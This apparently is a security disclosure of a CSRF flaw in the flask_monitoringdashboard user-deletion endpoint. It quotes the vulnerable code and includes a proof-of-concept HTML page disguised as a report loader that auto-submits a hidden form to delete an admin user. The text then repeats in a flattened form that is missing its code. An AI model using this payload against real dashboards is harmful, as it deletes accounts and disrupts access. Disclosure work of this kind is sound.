CSRF Vulnerability in User Deletion (/api/user/delete)
Summary
A Cross-Site Request Forgery (CSRF) vulnerability exists in the dashboard user-deletion endpoint /api/user/delete. The lack of CSRF protection allows an attacker to force an authenticated administrator to delete dashboard users without authorization.
Vulnerability Details
Configuration-Level Issue
File: flask_monitoringdashboard/core/auth.py
def admin_secure(func):
@wraps(func)
def wrapper(*args, **kwargs):
if session and session.get(config.link + '_logged_in'): # ❌ cookie-only authorization
if session.get(config.link + '_admin'):
return func(*args, **kwargs)
return redirect(url_for(config.blueprint_name + '.login'))
return wrapper
# ❌ No CSRF protection anywhere in the package
# ❌ Session cookie has no SameSite attribute enforced
Endpoint-Level Code Analysis
File: flask_monitoringdashboard/views/auth.py (Lines 62-71)
@blueprint.route('/api/user/delete', methods=['POST'])
@admin_secure
def user_delete():
"""Delete the user in the database."""
user_id = int(request.form['user_id'])
# ❌ No CSRF token validation
# ❌ No Origin/Referer verification
if flask.session.get(config.link + '_user_id') == user_id:
return jsonify({'message': 'Cannot delete itself.'}), BAD_REQUEST_STATUS
with session_scope() as session:
session.query(User).filter(User.id == user_id).delete() # ⚠️ deletes user
return 'OK'
Security Issues:
- ❌ No CSRF token validation
- ❌ No origin verification
- ⚠️ Deletes an arbitrary user (by
user_id) based only on the session cookie
Proof of Concept (PoC)
<!DOCTYPE html>
<html>
<head>
<title>Loading report...</title>
</head>
<body>
<h2>📈 Generating your weekly report...</h2>
<form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/user/delete" method="POST">
<input type="hidden" name="user_id" value="2">
</form>
<script>
setTimeout(function() {
document.getElementById('csrf-form').submit();
}, 1000);
</script>
</body>
</html>
Impact
Unauthorized user deletion - An attacker can remove dashboard users (e.g. other
administrators), disrupting access and monitoring. Combined with ISSUE_01, an attacker
can delete legitimate admins after planting their own.
CVSS Score: 6.5 (Medium) — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
CWE: CWE-352 (Cross-Site Request Forgery)
Reported by: flashzyc
Date: 2026-06-07
CSRF Vulnerability in User Deletion (/api/user/delete)
Summary
A Cross-Site Request Forgery (CSRF) vulnerability exists in the dashboard user-deletion endpoint
/api/user/delete. The lack of CSRF protection allows an attacker to force an authenticated administrator to delete dashboard users without authorization.Vulnerability Details
Configuration-Level Issue
File:
flask_monitoringdashboard/core/auth.pyEndpoint-Level Code Analysis
File:
flask_monitoringdashboard/views/auth.py(Lines 62-71)Security Issues:
user_id) based only on the session cookieProof of Concept (PoC)
Impact
Unauthorized user deletion - An attacker can remove dashboard users (e.g. other
administrators), disrupting access and monitoring. Combined with ISSUE_01, an attacker
can delete legitimate admins after planting their own.
CVSS Score: 6.5 (Medium) —
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:NCWE: CWE-352 (Cross-Site Request Forgery)
Reported by: flashzyc
Date: 2026-06-07